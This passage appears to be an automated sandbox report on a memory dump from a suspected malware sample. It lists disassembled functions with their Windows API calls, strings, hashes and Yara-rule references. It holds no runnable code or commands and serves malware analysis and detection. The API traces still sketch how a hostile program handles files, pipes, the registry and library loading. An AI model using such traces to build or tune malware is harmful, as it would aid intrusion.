Instruction ID: 191d935d6d324e9a8fc2477dbe11c58b7a75464552310268d8d62ac37bd16943
Opcode Fuzzy Hash: 63183a576b7044f1cacf4cae8cbebf15c96bbcbd0a2f7b21cbed1c8c843a2f06
Instruction Fuzzy Hash: F5318D39900248EFCF119FA5DC4AE9F3BB9FF84716F001024F902A2290EB359D24DB64

Uniqueness

Uniqueness Score: -1.00%

Function 04622E3A, Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 04622E4A
CreateFileW.KERNEL32(?,80000000,00000003,04648168,00000003,00000000,00000000), ref: 04622E67
GetLastError.KERNEL32 ref: 04622F0F

Part of subcall function 046379DF: lstrlen.KERNEL32(?,00000000,?,00000027,04648168,?,00000000,61636F4C,00000001), ref: 04637A15
Part of subcall function 046379DF: lstrcpy.KERNEL32(00000000,00000000), ref: 04637A39
Part of subcall function 046379DF: lstrcat.KERNEL32(00000000,00000000), ref: 04637A41

GetFileSize.KERNEL32(?,00000000,61636F4C,00000001), ref: 04622E9A
CreateFileMappingA.KERNEL32(?,04648168,00000002,00000000,00000000,?), ref: 04622EAE
lstrlen.KERNEL32(?), ref: 04622ECA
lstrcpy.KERNEL32(?,?), ref: 04622EDA
GetLastError.KERNEL32 ref: 04622EE2
HeapFree.KERNEL32(00000000,?), ref: 04622EF5
CloseHandle.KERNEL32(?,61636F4C,00000001), ref: 04622F07

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
String ID:
API String ID: 194907169-0
Opcode ID: ebe8a64fd1325ff5739466db1c210ec9d3535beb56f49d1d4d06baed9a4aa167
Instruction ID: 5e62a2746dc6d68e3b8bb06ad2c9e9429184bcddbeb558b05dbf23c228475a4d
Opcode Fuzzy Hash: ebe8a64fd1325ff5739466db1c210ec9d3535beb56f49d1d4d06baed9a4aa167
Instruction Fuzzy Hash: B92159B9900608FFDF109FA4D849A9E7FB9FB84754F108469F506E2250EB349E54DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0462E1B4, Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,04638735), ref: 0462E1C9

Part of subcall function 04641807: InterlockedExchange.KERNEL32(?,000000FF), ref: 0464180E

WaitForSingleObject.KERNEL32(?,000000FF,?,?,04638735), ref: 0462E1E9
CloseHandle.KERNEL32(00000000,?,04638735), ref: 0462E1F2
CloseHandle.KERNEL32(00000000,?,?,04638735), ref: 0462E1FC
RtlEnterCriticalSection.NTDLL(?), ref: 0462E204
RtlLeaveCriticalSection.NTDLL(?), ref: 0462E21C
Sleep.KERNEL32(000001F4), ref: 0462E22B
CloseHandle.KERNEL32(?), ref: 0462E238
LocalFree.KERNEL32(?), ref: 0462E243
RtlDeleteCriticalSection.NTDLL(?), ref: 0462E24D

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 1408595562-0
Opcode ID: 3c2d910787706c3bd8eb1df6622f6c50df9ec148380501cd071ca519980fe747
Instruction ID: 6474236f0ff097d4f6422d72dd1457d786ba3741525436a5e110c21d3bd28919
Opcode Fuzzy Hash: 3c2d910787706c3bd8eb1df6622f6c50df9ec148380501cd071ca519980fe747
Instruction Fuzzy Hash: A3118C39101B26EFDF305BA5E949A5AB7A9FF947543051828E193A3550FF3AF8508F20

Uniqueness

Uniqueness Score: -1.00%

Function 046351C2, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 191stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,05D39A97,74726F50,?,05D39A97,75636553,?,05D39A97,72657355,?,05D39A97,76726553,00000000,00000000,00000000), ref: 046352C0
lstrcpyW.KERNEL32(00000000,00780030), ref: 046352E3
lstrcatW.KERNEL32(00000000,00000000), ref: 046352EB
lstrlenW.KERNEL32(00000000,?,05D39A97,73736150,?,05D39A97,74726F50,?,05D39A97,75636553,?,05D39A97,72657355,?,05D39A97,76726553), ref: 04635336
memcpy.NTDLL(00000000,?,00000008,00000006), ref: 0463539E
LocalFree.KERNEL32(?,00000006), ref: 046353B7

Strings

Salt, xrefs: 046351D3
P, xrefs: 0463523B

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
String ID: P$Salt
API String ID: 3649579052-2273357893
Opcode ID: bde24cdd57b73afec4968d3769af61ddd6f05b5777ca8c67b2d647d92a5ce826
Instruction ID: 0a69552031d75591f6778f68e8473837549243c0c1b3764bcaa2ab816291323b
Opcode Fuzzy Hash: bde24cdd57b73afec4968d3769af61ddd6f05b5777ca8c67b2d647d92a5ce826
Instruction Fuzzy Hash: 26617C7590025ABFDF10EFA4DC88DAE7BB9EF96309B048026E505A7210FB74AD05CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0462A293, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000001,00000000,00000000,00000000,0463A4A4,00000000,00000001,40444940,?,?), ref: 0462A2AA
lstrlen.KERNEL32(?), ref: 0462A2BA
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0462A2EE
RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0462A319
memcpy.NTDLL(00000000,?,?), ref: 0462A338
HeapFree.KERNEL32(00000000,00000000), ref: 0462A399
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0462A3BB

Strings

W, xrefs: 0462A3E7

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Allocatelstrlenmemcpy$Free
String ID: W
API String ID: 3204852930-655174618
Opcode ID: fe24d26c1b3da3bd4f39d7f8adc2962f7fc76cb30a2f268f93268ebd42ed2e4e
Instruction ID: bca4e4899f37a4248ba47b078ef19e197760af39da930414307ac51611a11085
Opcode Fuzzy Hash: fe24d26c1b3da3bd4f39d7f8adc2962f7fc76cb30a2f268f93268ebd42ed2e4e
Instruction Fuzzy Hash: D74124B290062AFBDF118F94CD84AAF7BB9EF44344F148469E904E7200F775AA549FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0463D29F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0462DCCE: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0463DC21,00000000,00000000,00000004,00000000,?,0462815A,?,?,00000000), ref: 0462DCDA
Part of subcall function 0462DCCE: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0463DC21,00000000,00000000,00000004,00000000,?,0462815A,?), ref: 0462DD38
Part of subcall function 0462DCCE: lstrcpy.KERNEL32(00000000,00000000), ref: 0462DD48

lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 0463D2EB
wsprintfA.USER32 ref: 0463D319
lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 0463D377
GetLastError.KERNEL32 ref: 0463D38E
ResetEvent.KERNEL32(?), ref: 0463D3A2
ResetEvent.KERNEL32(?), ref: 0463D3A7
GetLastError.KERNEL32 ref: 0463D3BF

Strings

`, xrefs: 0463D352

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
String ID: `
API String ID: 2276693960-1850852036
Opcode ID: f9ee63f9a418294a7222d0a88517f522f9406c6da59f3060fee0ec3aeac4deed
Instruction ID: a7e945ec5848de0a73cd9ac7ac9825610ede033e1e9d28b66d06fb64dc050c36
Opcode Fuzzy Hash: f9ee63f9a418294a7222d0a88517f522f9406c6da59f3060fee0ec3aeac4deed
Instruction Fuzzy Hash: 3C418E75400209EFEF11DFA5DD84BAB7BB8EF55315F00041AE80192250FB38AE54CB61

Uniqueness

Uniqueness Score: -1.00%

Function 046325D1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0463AAC8,00000000,?,?,?,?,0463AAC8,00000035,00000000,?,00000000), ref: 04632601
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04632617
memcpy.NTDLL(00000010,0463AAC8,00000000,?,?,0463AAC8,00000035,00000000), ref: 0463264D
memcpy.NTDLL(00000010,00000000,00000035,?,?,0463AAC8,00000035), ref: 04632668
CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 04632686
GetLastError.KERNEL32(?,?,0463AAC8,00000035), ref: 04632690
HeapFree.KERNEL32(00000000,00000000,?,?,0463AAC8,00000035), ref: 046326B3

Strings

(, xrefs: 0463269A

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID: (
API String ID: 2237239663-3887548279
Opcode ID: 44004891e0028043a730dea9dd035a463dfbc156523b5b87fc860418382216c0
Instruction ID: 761c62314df2a90e8e01d433ed2f0c8c40d5c1f487fac3f0508652398d3596ed
Opcode Fuzzy Hash: 44004891e0028043a730dea9dd035a463dfbc156523b5b87fc860418382216c0
Instruction Fuzzy Hash: 1131AC3AA00209EFDB208FA9DC45AAB7BB8EF84751F004429FA0593200F674ED55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04629422, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0462943D
RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 046294F5

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0462948B
GetProcAddress.KERNEL32(00000000,4F424157), ref: 046294A4
GetLastError.KERNEL32(?,00000008,?,00000001), ref: 046294C3
FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 046294D5
GetLastError.KERNEL32(?,00000008,?,00000001), ref: 046294DD

Strings

Software\Microsoft\WAB\DLLPath, xrefs: 0462942E

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
String ID: Software\Microsoft\WAB\DLLPath
API String ID: 1628847533-3156921957
Opcode ID: dc65c5cafa64ab4b9288b1f5f4f31c79b2adbcc6b8c3f351a96c024f966be374
Instruction ID: 967ce4b35fe626a7d1414a438fd93e0a079ac426ba57089eb9b30e53a20709b2
Opcode Fuzzy Hash: dc65c5cafa64ab4b9288b1f5f4f31c79b2adbcc6b8c3f351a96c024f966be374
Instruction Fuzzy Hash: 5F218DB5A00A28BFCF21AFA4DD88DAEBB78EBC4714F104165F915A3211F6306E54DF50

Uniqueness

Uniqueness Score: -1.00%

Function 046373D6, Relevance: 13.7, APIs: 9, Instructions: 168memorythreadsleepCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 04637417
memset.NTDLL ref: 0463742B

Part of subcall function 04626213: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 0462624B
Part of subcall function 04626213: RtlAllocateHeap.NTDLL(00000000,?), ref: 0462625F
Part of subcall function 04626213: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 04626279
Part of subcall function 04626213: RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,04622037,05D3BB9D,?,?), ref: 046262A3

GetCurrentThreadId.KERNEL32 ref: 046374B8
GetCurrentThread.KERNEL32 ref: 046374CB
RtlEnterCriticalSection.NTDLL(05D3C0A0), ref: 04637572
Sleep.KERNEL32(0000000A), ref: 0463757C
RtlLeaveCriticalSection.NTDLL(05D3C0A0), ref: 046375A2
HeapFree.KERNEL32(00000000,?), ref: 046375D0
HeapFree.KERNEL32(00000000,00000018), ref: 046375E3

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
String ID:
API String ID: 1146182784-0
Opcode ID: 10e1e947f548ef69a831250087fca2328bc7690395ebbce13e9029995bd55ae1
Instruction ID: d4b0273f96217dff143246c33a80567f7b65667697c899ef4b3ce72e9369bba7
Opcode Fuzzy Hash: 10e1e947f548ef69a831250087fca2328bc7690395ebbce13e9029995bd55ae1
Instruction Fuzzy Hash: C85139B9504341AFDB10EF64D88096ABBE8FB98355F40992EF581D7310E734ED498FA2

Uniqueness

Uniqueness Score: -1.00%

Function 04633A4F, Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 04637FE1: RtlEnterCriticalSection.NTDLL(046483A8), ref: 04637FE9
Part of subcall function 04637FE1: RtlLeaveCriticalSection.NTDLL(046483A8), ref: 04637FFE
Part of subcall function 04637FE1: InterlockedIncrement.KERNEL32(0000001C), ref: 04638017

RtlAllocateHeap.NTDLL(00000000,00000018,636F6C42), ref: 04633A8C
memset.NTDLL ref: 04633A9D
lstrcmpi.KERNEL32(?,?), ref: 04633ADD
RtlAllocateHeap.NTDLL(00000000,?), ref: 04633B09
memcpy.NTDLL(00000000,?,?), ref: 04633B1D
memset.NTDLL ref: 04633B2A
memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 04633B43
memcpy.NTDLL(-00000005,44444948,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 04633B66
HeapFree.KERNEL32(00000000,?), ref: 04633B83

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
String ID:
API String ID: 694413484-0
Opcode ID: 3bc9309d4df9b909aa91c0cb82275644dad5b7c4d75682ebc6e7259367e7d2bd
Instruction ID: a96a3ef36e24f8a138ddbcb12dfaf630b70d151853cacd78cb8b23109d03d41a
Opcode Fuzzy Hash: 3bc9309d4df9b909aa91c0cb82275644dad5b7c4d75682ebc6e7259367e7d2bd
Instruction Fuzzy Hash: F841CE76A00259AFEF10DFA4CC84B9EBBB9FF54319F104069E905A7350F739AE448B54

Uniqueness

Uniqueness Score: -1.00%

Function 04638341, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000), ref: 04638358
lstrlen.KERNEL32(?), ref: 04638360
lstrlen.KERNEL32(?), ref: 046383CB
RtlAllocateHeap.NTDLL(00000000,?), ref: 046383F6
memcpy.NTDLL(00000000,00000002,?), ref: 04638407
memcpy.NTDLL(00000000,?,?), ref: 0463841D
memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0463842F
memcpy.NTDLL(00000000,046443E8,00000002,00000000,?,?,00000000,?,?), ref: 04638442
memcpy.NTDLL(00000000,?,00000002), ref: 04638457

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: memcpy$lstrlen$AllocateHeap
String ID:
API String ID: 3386453358-0
Opcode ID: 5877e4d176357b0073e3789ee6eaf51bee761405a152d88f25891991ced711b1
Instruction ID: 192925639749c5b9fcc98e2b9e0b58f5258aab33213c56e0c7f56a68cc5aba0c
Opcode Fuzzy Hash: 5877e4d176357b0073e3789ee6eaf51bee761405a152d88f25891991ced711b1
Instruction Fuzzy Hash: 5B414776D00219EBCF01DFA8CC84A9EBBB8EF98319F14445AE905A7201F775EA50DF90

Uniqueness

Uniqueness Score: -1.00%

Function 046331AE, Relevance: 13.6, APIs: 9, Instructions: 108memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 04637FE1: RtlEnterCriticalSection.NTDLL(046483A8), ref: 04637FE9
Part of subcall function 04637FE1: RtlLeaveCriticalSection.NTDLL(046483A8), ref: 04637FFE
Part of subcall function 04637FE1: InterlockedIncrement.KERNEL32(0000001C), ref: 04638017

RtlAllocateHeap.NTDLL(00000000,00000000,-00000008), ref: 046331FC
lstrlen.KERNEL32(00000008,?,?,?,04623715,00000000,00000000,-00000008), ref: 0463320C
RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 0463321E
HeapFree.KERNEL32(00000000,?,?,?,?,04623715,00000000,00000000,-00000008), ref: 04633230
memcpy.NTDLL(?,-00000008,00000000,?,?,?,04623715,00000000,00000000,-00000008), ref: 04633244
lstrcpy.KERNEL32(00000020), ref: 04633276
RtlEnterCriticalSection.NTDLL(046483A8), ref: 04633281
RtlLeaveCriticalSection.NTDLL(046483A8), ref: 046332DA

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
String ID:
API String ID: 3746371830-0
Opcode ID: 1995c540af6fda74d29f826f8ed364cbef818c1c32381c21fd51d603431e3aba
Instruction ID: 64cb654021d3057b2f34fbe973e9abbbc6bcd8af999c5579056944ca9979d62b
Opcode Fuzzy Hash: 1995c540af6fda74d29f826f8ed364cbef818c1c32381c21fd51d603431e3aba
Instruction Fuzzy Hash: 8641A57A500341EFCF22AF94D885B5A7BF4FF94712F10A019E9069B301EB75E9A0CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04632B68, Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 04635152: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04635184
Part of subcall function 04635152: HeapFree.KERNEL32(00000000,00000000,?,?,04632B84,?,00000022,00000000,00000000,00000000), ref: 046351A9

Part of subcall function 04640C91: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,04632BA5,?,?,?,?,?,00000022,00000000,00000000), ref: 04640CCD
Part of subcall function 04640C91: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,04632BA5,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 04640D20

lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 04632BDA
lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 04632BE2
lstrlen.KERNEL32(?), ref: 04632BEC
RtlAllocateHeap.NTDLL(00000000,?), ref: 04632C01
wsprintfA.USER32 ref: 04632C3D
HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 04632C5C
HeapFree.KERNEL32(00000000,?), ref: 04632C71
HeapFree.KERNEL32(00000000,?), ref: 04632C7E
HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 04632C8C

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Free$lstrlen$Allocate$wsprintf
String ID:
API String ID: 168057987-0
Opcode ID: 22767f9d688c56cc0accaa6771222b7c0d78c8bc821dbeebd64cbacf90c55e01
Instruction ID: caf287176c455d8bf6065ec142a1d03c8e9bc4c1b918efb2c57be880c59d1c57
Opcode Fuzzy Hash: 22767f9d688c56cc0accaa6771222b7c0d78c8bc821dbeebd64cbacf90c55e01
Instruction Fuzzy Hash: 4F310F75600354BFDB11AF60CC84E5BBBE8FF88B15F00082AF945A3291E770EC148BA6

Uniqueness

Uniqueness Score: -1.00%

Function 046229AD, Relevance: 13.6, APIs: 9, Instructions: 89filesynchronizationCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000001,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000), ref: 046229ED
GetLastError.KERNEL32 ref: 046229F7
WaitForSingleObject.KERNEL32(000000C8), ref: 04622A1C
CreateFileW.KERNEL32(00000001,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 04622A3F
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 04622A67
WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 04622A7C
SetEndOfFile.KERNEL32(?), ref: 04622A89
GetLastError.KERNEL32 ref: 04622A95
CloseHandle.KERNEL32(?), ref: 04622AA1

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
String ID:
API String ID: 2864405449-0
Opcode ID: 4e9d2989b92d27c7658d49f6db960f0b676dc5638b6d609a6944a653076cf90e
Instruction ID: d57ba7cf6862a8e3ff940cc3e165d8753375159062824534aba3b94ca2ecf91c
Opcode Fuzzy Hash: 4e9d2989b92d27c7658d49f6db960f0b676dc5638b6d609a6944a653076cf90e
Instruction Fuzzy Hash: 8B31AD35900618BFEF209FA5DD4ABAE7B78EB54325F108190F910A21D0E7B45E65DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0462F028, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,04635F25,00000008,?,00000010,00000001,00000000,0000003A), ref: 0462F047
WriteFile.KERNEL32(?,00000001,?,?,?), ref: 0462F07B
ReadFile.KERNEL32(?,00000001,?,?,?), ref: 0462F083
GetLastError.KERNEL32 ref: 0462F08D
WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 0462F0A9
GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 0462F0C2
CancelIo.KERNEL32(?), ref: 0462F0D7
CloseHandle.KERNEL32(?), ref: 0462F0E7
GetLastError.KERNEL32 ref: 0462F0EF

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
String ID:
API String ID: 4263211335-0
Opcode ID: 1fdd9d0b768066f8f4ac37e55314dad4f75427a763d396eb01e57b5ba5f326ce
Instruction ID: 6c73a71e1ec2ce0326054cefff663ad8967f292f86e1aa50f303796307f6efc1
Opcode Fuzzy Hash: 1fdd9d0b768066f8f4ac37e55314dad4f75427a763d396eb01e57b5ba5f326ce
Instruction Fuzzy Hash: CB21833A900528BFCF11AFA4D9499EE7B79FB98750F008412FA06D3241FB349A55DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0462CC6B, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0462CC77
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0462CC8D
_snwprintf.NTDLL ref: 0462CCB2
CreateFileMappingW.KERNEL32(000000FF,04648168,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 0462CCCE
GetLastError.KERNEL32 ref: 0462CCE0
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0462CCF7
CloseHandle.KERNEL32(00000000), ref: 0462CD18
GetLastError.KERNEL32 ref: 0462CD20

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 02217fe99f5aef9282ad309b83fd20ba36ed8b9b2a6d4b51378c7ff70caa5241
Instruction ID: 73fd19631f89bbb6cf617c626c1f0fdd70ddd9bcc4ae863e29f08b1f9c54c5d1
Opcode Fuzzy Hash: 02217fe99f5aef9282ad309b83fd20ba36ed8b9b2a6d4b51378c7ff70caa5241
Instruction Fuzzy Hash: F721EB76640618BBDB21EB58DD05F9E3BA9EFD4B50F210022F505E72C1FA74A905DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04634BF1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 147timestringCOMMON

Download Yara Rule

APIs

Part of subcall function 046345F5: InterlockedIncrement.KERNEL32(00000018), ref: 04634646
Part of subcall function 046345F5: RtlLeaveCriticalSection.NTDLL(05D3C148), ref: 046346D1

OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,00000000,00000000,?,?,?,04621BC3,?,?,?,00000000), ref: 04634C48
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,00000000,00000000,?,?,?,04621BC3,?), ref: 04634C66
GetSystemTimeAsFileTime.KERNEL32(?), ref: 04634CCE
lstrlenW.KERNEL32(?), ref: 04634D43
GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 04634D5F
memcpy.NTDLL(00000014,?,00000002), ref: 04634D77

Part of subcall function 046378B2: RtlLeaveCriticalSection.NTDLL(?), ref: 0463792F

Strings

o, xrefs: 04634D34

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
String ID: o
API String ID: 2541713525-252678980
Opcode ID: 734d1d2fd9e4eef8d0631cb30aff89aa4bc32d94b4f5e58218207f2fd0e2c721
Instruction ID: 5654e960009edda743e319c06f11ed03a468956ff71ec69cfd2c79959e235c55
Opcode Fuzzy Hash: 734d1d2fd9e4eef8d0631cb30aff89aa4bc32d94b4f5e58218207f2fd0e2c721
Instruction Fuzzy Hash: 6651ADB5600646AFEB20DF64D884BA6F7A8FF44706F004A2AE605D7240FB74F985CB94

Uniqueness

Uniqueness Score: -1.00%

Function 046238C5, Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0462113F: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04621154
Part of subcall function 0462113F: lstrlen.KERNEL32(?,00000000,00000000,?,?,?), ref: 0462117D

RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0462390A
RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04623922
HeapFree.KERNEL32(00000000,?), ref: 04623984
RtlAllocateHeap.NTDLL(00000000,?), ref: 04623998
WaitForSingleObject.KERNEL32(00000000), ref: 046239EA
HeapFree.KERNEL32(00000000,?), ref: 04623A13
HeapFree.KERNEL32(00000000,?), ref: 04623A23
RegCloseKey.ADVAPI32(?), ref: 04623A2C

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
String ID:
API String ID: 3503961013-0
Opcode ID: ee258449a05e1a23bdeb8bf735d05ea653c5e234f6695b7b16ae2dda8998c042
Instruction ID: b3d92d27fb05a4db8620f7cbc9574290bd42bb5336faa36cabbf7df6d211e356
Opcode Fuzzy Hash: ee258449a05e1a23bdeb8bf735d05ea653c5e234f6695b7b16ae2dda8998c042
Instruction Fuzzy Hash: 5141E5B9D00629FFDF119FE4C9849EEBB79FB58304F10446AE901A2210E7395E94DF60

Uniqueness

Uniqueness Score: -1.00%

Function 04626DB3, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,0463D339), ref: 04626DC9
wsprintfA.USER32 ref: 04626DF1
lstrlen.KERNEL32(?), ref: 04626E00

Part of subcall function 04641844: HeapFree.KERNEL32(00000000,?,0463DF8D,00000000), ref: 04641850

wsprintfA.USER32 ref: 04626E40
wsprintfA.USER32 ref: 04626E75
memcpy.NTDLL(00000000,?,?), ref: 04626E82
memcpy.NTDLL(00000008,046443E8,00000002,00000000,?,?), ref: 04626E97
wsprintfA.USER32 ref: 04626EBA

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
String ID:
API String ID: 2937943280-0
Opcode ID: 1ce5521fdc874cb447141bc89ddebce13db3c5b9b5e1b21660a0251768ceb4c0
Instruction ID: 2b37d5da36e9375b0686c661ef296b3599fb8938df0d604682c2dc4f9a51e7f3
Opcode Fuzzy Hash: 1ce5521fdc874cb447141bc89ddebce13db3c5b9b5e1b21660a0251768ceb4c0
Instruction Fuzzy Hash: 4D413B75A0060AAFDF04DBA8D984EAEB7FCEF85308B104059E519D3211FA34EE15CF64

Uniqueness

Uniqueness Score: -1.00%

